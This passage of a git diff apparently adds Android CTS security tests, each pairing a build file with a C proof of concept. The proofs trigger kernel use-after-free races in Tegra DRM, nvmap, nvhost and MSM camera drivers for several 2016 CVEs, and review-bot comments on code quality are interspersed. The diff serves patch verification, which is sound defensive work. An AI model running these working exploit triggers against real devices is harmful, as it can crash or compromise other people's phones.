+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
new file mode 100644
index 0000000..f38f411
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_STOP_KEEPON 0x11
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_STOP_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_STOP_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_STOP_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
new file mode 100644
index 0000000..fd7fc21
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6736
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
new file mode 100644
index 0000000..77f4b7a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
@@ -0,0 +1,174 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define SUBMIT_THREAD_NUM 900
+#define TRY_TIMES SUBMIT_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+int fd;
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_submit submit_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* submit_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ if(ret){
+ goto out_submit_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set submit */
+ submit_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_submit_thread:
+ /* kill submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_kill(submit_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
new file mode 100644
index 0000000..bba13f3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8412
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
new file mode 100644
index 0000000..d438b40
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
+#define MSM_SD_SHUTDOWN 0xc00856dd
+
+int fd;
+
+
+int main() {
+ long i;
+ int pid;
+ pthread_t th[6];
+ int argn[50] = {0};
+
+ fd = open("/dev/v4l-subdev7", 0x0ul );
+
+
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ pid = fork();
+ if(!pid){
+ argn[0] = 1;
+ while(1){
+ usleep(10);
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+ }
+ }
+ i = 0;
+ while(1){
+ i++;
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ usleep(100);
+
+ argn[0] = 0;
+ syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
+
+ }
+
+ close(fd);
+
+ return 0;
+}
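Review bot: The result of `open("/dev/v4l-subdev7", ...)` is never checked, so on a device without that node every later ioctl runs against fd -1 and the program still spins forever; add `if (fd < 0) return 0;` directly after the open so the test exits cleanly when the driver is absent. Both `while(1)` loops are unbounded, which makes `close(fd); return 0;` unreachable and leaves the forked child running once the harness kills the parent. A bounded attempt count (as the CVE-2016-8425 test does with `TRY_TIMES`), followed by `kill(pid, SIGKILL)` and a wait for the child, would leave the device clean between tests; `main` in the CVE-2016-8424 test has the same never-ending loop. `pthread_t th[6]` and the counter `i` are unused and can be removed together with `<pthread.h>`.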
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+ static int data = 1024;
+ ioctl(g_fd, NVMAP_IOC_FREE, data);
+ //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(0, 2);
+
+ int i;
+ while (1) {
+ if (init == 0) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ init = 1;
+ }
+ trigger_nvmap_free();
+ }
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ if (init == 0)
+ pthread_cond_signal(&cond);
+ trigger_nvmap_create();
+ }
+ return 0;
+}
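Review bot: `prepare_data()` dereferences the result of `calloc(1, 0x1000)` in `g_allocation->size = 1024;` without a NULL check; add `if (!data) exit(1);` before the assignment. The allocations in `prepare_data()` of the CVE-2016-8428 test are unchecked in the same way. The log lines after `setpriority` and `mprotect` print `errno` unconditionally, so they can show a stale value left by an earlier call; test the return value first, e.g. `if (mprotect(data, 0x1000, PROT_READ) < 0) printf("[*] mprotect, error = %d\n", errno);`. The flag `init` is read by `main` and written by `race_thread` outside the mutex, which is a data race in the test itself and should at least be documented.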
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
